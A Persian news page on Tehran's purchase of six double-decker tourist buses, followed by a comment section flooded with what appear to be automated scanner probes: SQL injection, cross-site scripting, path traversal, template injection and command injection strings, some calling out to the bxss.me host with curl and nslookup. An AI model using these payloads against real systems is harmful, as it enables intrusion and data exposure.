اتوبوس های دوطبقه تفریحی توریستی در راه تهران

اتوبوس های دوطبقه تفریحی توریستی در راه تهران

معاون گردشگری اداره کل میراث فرهنگی، صنایع دستی و گردشگری استان تهران از خرید 6 دستگاه اتوبوس دوطبقه تفریحی توریستی برای استفاده در طرح تهرانگردی گردشگران خارجی خبر داد.
علی رفیعی در در این باره گفت: «اتوبوس های خریداری شده محصول کشور سوئد هستند که یک دستگاه از این تعداد، ظرف چند روز آینده وارد ناوگان طرح تهرانگری خواهد شد.» وی با بیان اینکه این 6 اتوبوس توسط بخش خصوصی تا پایان سال خریداری و وارد کشور خواهند شد، اظهار کرد: «برای خرید هر یک از این اتوبوس های دو طبقه گردشگری، بالغ بر 10 میلیارد ریال هزینه خواهد شد.»

معاون گردشگری میراث فرهنگی استان تهران خاطر نشان کرد: «در حال حاضر طرح تهرانگردی گردشگران خارجی با استفاده از دو دستگاه اتوبوس 302 قدیمی اجرا می شود.» رفیعی همچنین از راه اندازی 14 ایستگاه دائمی تورهای تهرانگردی خبر داد و گفت: «ایستگاه های دائمی تهرانگردی با همکاری نیروی انتظامی، شهرداری و ادارات مرتبط در مناطق 11 و 12 پایتخت جانمایی خواهند شد.»

او درخصوص ورود گردشگران داخلی به تهران نیز بیان کرد: «براساس بررسی های انجام شده پیش بینی می کنیم تا پایان فصل تابستان، حدود سه میلیون گردشگر داخلی از مناطق مختلف کشور به تهران سفر کنند.»

به گفته رفیعی، شهر تهران دارای یک هزار و 869 دفتر خدمات مسافرتی، 104 هتل، 24 هتل آپارتمان، 107 میهمانپذیر، 100 سفره خانه سنتی، 15 پانسیون، 119 مجتمع پذیرایی بین راهی، 35 واحد پذیرایی، 138 زائرسرا و 27 آموزشگاه گردشگری است.
 

برچسب ها:  

نظرات

 1. تست تست تاریخ : 05 اسفند 1400

  Noroonasrin2@gmail.com fyxfuxuf

 2. sdfs sdfsdf تاریخ : 14 آذر 1402

  "'/<jxqz13216>=()

 3. sdfs sdfsdf تاریخ : 14 آذر 1402

  javascript:alert(1)

 4. sdfs sdfsdf تاریخ : 14 آذر 1402

  //rst605.html

 5. sdfs sdfsdf تاریخ : 14 آذر 1402

  smta<bʺcʹdetms769

 6. sdfs sdfsdf تاریخ : 14 آذر 1402

  a|id

 7. sdfs sdfsdf تاریخ : 14 آذر 1402

  a|ver

 8. sdfs sdfsdf تاریخ : 14 آذر 1402

  a&ping 2130706433&#'&ping 2130706434&a&#"&ping 2130706435&a\

 9. sdfs sdfsdf تاریخ : 14 آذر 1402

  QIUaGzt QIUaGzt

 10. sdfs sdfsdf تاریخ : 14 آذر 1402

  www.example.com

 11. sdfs sdfsdf تاریخ : 14 آذر 1402

  ${165152-1}

 12. sdfs sdfsdf تاریخ : 14 آذر 1402

  {{165152-1}}

 13. sdfs sdfsdf تاریخ : 14 آذر 1402

  1 or 1=ExtractValue(1,CoNCaT(0x3a,(md5(122459))))

 14. sdfs sdfsdf تاریخ : 14 آذر 1402

  1' or 1=ExtractValue(1,CoNCaT(0x3a,(md5(122459)))) or 1='2

 15. sdfs sdfsdf تاریخ : 14 آذر 1402

  99999 or 1>0-- a

 16. sdfs sdfsdf تاریخ : 14 آذر 1402

  1 and 1>1-- a

 17. sdfs sdfsdf تاریخ : 14 آذر 1402

  99999' or 1>0-- a

 18. sdfs sdfsdf تاریخ : 14 آذر 1402

  1' and 1>1-- a

 19. sdfs sdfsdf تاریخ : 14 آذر 1402

  1 rlike (case when 1 then BENCHMARK(450000000,MD5(0x41)) else 0 end) -- a

 20. sdfs sdfsdf تاریخ : 14 آذر 1402

  1' rlike (case when 1 then BENCHMARK(450000000,MD5(0x41)) else 0 end) -- a

 21. sdfs sdfsdf تاریخ : 14 آذر 1402

  1; if (1=1) waitfor delay '00:00:03'--

 22. sdfs sdfsdf تاریخ : 14 آذر 1402

  1'; if (1=1) waitfor delay '00:00:03'--

 23. sdfs sdfsdf تاریخ : 14 آذر 1402

  hTtp://example.com/?

 24. sdfs sdfsdf تاریخ : 14 آذر 1402

  example.com/?

 25. sdfs sdfsdf تاریخ : 14 آذر 1402

  ../../../../../../../../etc/hosts1

 26. sdfs sdfsdf تاریخ : 14 آذر 1402

  ../../../../../../../../etc/hosts

 27. sdfs sdfsdf تاریخ : 14 آذر 1402

  ../../../../../../../../windows/win.ini

 28. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 29. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 30. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 31. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 32. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  555

 33. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  555

 34. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  555

 35. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  555

 36. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  555

 37. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 38. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  response.write(9926144*9738928)

 39. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  '+response.write(9926144*9738928)+'

 40. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  "+response.write(9926144*9738928)+"

 41. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 42. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 43. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 44. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 45. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 46. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 47. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 48. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1%0abcc:009247.146-3785.146.7b6e6.19731.2@bxss.me

 49. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  to@example.com>%0d%0abcc:009247.146-3786.146.7b6e6.19731.2@bxss.me

 50. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  ../../../../../../../../../../../../../../etc/passwd

 51. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  ../../../../../../../../../../../../../../windows/win.ini

 52. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  file:///etc/passwd

 53. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  echo tjpomi$()\ vnmovh\nz^xyu||a #' &echo tjpomi$()\ vnmovh\nz^xyu||a #|" &echo tjpomi$()\ vnmovh\nz^xyu||a #

 54. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  &echo tqvzbd$()\ ezaqfi\nz^xyu||a #' &echo tqvzbd$()\ ezaqfi\nz^xyu||a #|" &echo tqvzbd$()\ ezaqfi\nz^xyu||a #

 55. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 56. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1&echo kaqdtr$()\ oojyix\nz^xyu||a #' &echo kaqdtr$()\ oojyix\nz^xyu||a #|" &echo kaqdtr$()\ oojyix\nz^xyu||a #

 57. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  ../1

 58. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  |echo zabofr$()\ vylrnt\nz^xyu||a #' |echo zabofr$()\ vylrnt\nz^xyu||a #|" |echo zabofr$()\ vylrnt\nz^xyu||a #

 59. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'?

 60. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1|echo ywsntr$()\ ruysmi\nz^xyu||a #' |echo ywsntr$()\ ruysmi\nz^xyu||a #|" |echo ywsntr$()\ ruysmi\nz^xyu||a #

 61. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 62. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  (nslookup -q=cname hitmgxyoxfrlr7351d.bxss.me||curl hitmgxyoxfrlr7351d.bxss.me))

 63. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  $(nslookup -q=cname hitygghlmdrpv6327a.bxss.me||curl hitygghlmdrpv6327a.bxss.me)

 64. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1<esi:include src="http://bxss.me/rpb.png"/>

 65. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  &nslookup -q=cname hithvaxetwfdr966d4.bxss.me&'\"`0&nslookup -q=cname hithvaxetwfdr966d4.bxss.me&`'

 66. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  ${9999592+9999071}

 67. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  &(nslookup -q=cname hitynonjvfevf6dee8.bxss.me||curl hitynonjvfevf6dee8.bxss.me)&'\"`0&(nslookup -q=cname hitynonjvfevf6dee8.bxss.me||curl hitynonjvfevf6dee8.bxss.me)&`'

 68. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  |(nslookup -q=cname hitmibtzzlzzn6267e.bxss.me||curl hitmibtzzlzzn6267e.bxss.me)

 69. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  `(nslookup -q=cname hitzqkljxgzvbe8e11.bxss.me||curl hitzqkljxgzvbe8e11.bxss.me)`

 70. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  ;(nslookup -q=cname hityntbcpeqvy7d5ff.bxss.me||curl hityntbcpeqvy7d5ff.bxss.me)|(nslookup -q=cname hityntbcpeqvy7d5ff.bxss.me||curl hityntbcpeqvy7d5ff.bxss.me)&(nslookup -q=cname hityntbcpeqvy7d5ff.bxss.me||curl hityntbcpeqvy7d5ff.bxss.me)

 71. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  )

 72. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  !(()&&!|*|*|

 73. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  ^(#$!@#$)(()))******

 74. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

 75. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

 76. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  Http://bxss.me/t/fit.txt

 77. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  http://bxss.me/t/fit.txt%3F.jpg

 78. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  /etc/shells

 79. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  c:/windows/win.ini

 80. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  bxss.me

 81. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  '.gethostbyname(lc('hitvz'.'unicpkri91257.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(80).chr(117).chr(87).'

 82. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  ".gethostbyname(lc("hitjo"."avxpjdch610a8.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(87).chr(104).chr(76)."

 83. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 84. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  HttP://bxss.me/t/xss.html?%00

 85. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 86. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  xfs.bxss.me

 87. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  bxss.me/t/xss.html?%00

 88. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  "+"A".concat(70-3).concat(22*4).concat(112).concat(70).concat(114).concat(67)+(require"socket" Socket.gethostbyname("hitmc"+"iqajpfjy84220.bxss.me.")[3].to_s)+"

 89. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 90. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 91. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  '+'A'.concat(70-3).concat(22*4).concat(104).concat(80).concat(106).concat(68)+(require'socket' Socket.gethostbyname('hitzx'+'neyoucbpa49c5.bxss.me.')[3].to_s)+'

 92. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  '"()

 93. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  '"

 94. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1'&&sleep(27*1000)*whqmbz&&'

 95. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  <!--

 96. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1"&&sleep(27*1000)*smvikv&&"

 97. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 98. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

 99. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1'||sleep(27*1000)*bjocxj||'

 100. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  ';print(md5(31337));$a='

 101. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  ";print(md5(31337));$a="

 102. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1"||sleep(27*1000)*wogxuw||"

 103. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  ${@print(md5(31337))}

 104. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  ${@print(md5(31337))}\

 105. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  '.print(md5(31337)).'

 106. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1'"()&%<zzz><ScRiPt >qW2m(9594)</ScRiPt>

 107. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  '"()&%<zzz><ScRiPt >qW2m(9735)</ScRiPt>

 108. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  19735189

 109. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 110. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 111. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 112. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 113. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 114. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 115. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 116. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 117. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 118. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 119. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 120. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 121. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 122. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 123. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 124. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 125. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 126. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 127. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 128. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 129. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 130. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1bkZwLdNN

 131. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1

 132. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  -1 OR 2+164-164-1=0+0+0+1 --

 133. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  -1 OR 2+784-784-1=0+0+0+1

 134. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  -1' OR 2+715-715-1=0+0+0+1 --

 135. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  -1' OR 2+425-425-1=0+0+0+1 or 'sD1ZOfsw'='

 136. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  -1" OR 2+636-636-1=0+0+0+1 --

 137. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1*if(now()=sysdate(),sleep(15),0)

 138. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

 139. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

 140. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

 141. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1-1; waitfor delay '0:0:15' --

 142. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1-1); waitfor delay '0:0:15' --

 143. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1-1 waitfor delay '0:0:15' --

 144. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1f6k9CUp9'; waitfor delay '0:0:15' --

 145. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1-1 OR 387=(SELECT 387 FROM PG_SLEEP(15))--

 146. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1-1) OR 259=(SELECT 259 FROM PG_SLEEP(15))--

 147. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1-1)) OR 239=(SELECT 239 FROM PG_SLEEP(15))--

 148. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  12td92udG' OR 108=(SELECT 108 FROM PG_SLEEP(15))--

 149. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1KgLqUEPD') OR 492=(SELECT 492 FROM PG_SLEEP(15))--

 150. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1WGCCnT5X')) OR 510=(SELECT 510 FROM PG_SLEEP(15))--

 151. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

 152. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

 153. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1'"

 154. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  1????%2527%2522\'\"

 155. aYlNlfdXkaqe6e9l')) OR 129=(SELECT 129 FROM PG_SLEEP(15))-- تاریخ : 19 دی 1402

  @@Mj6D2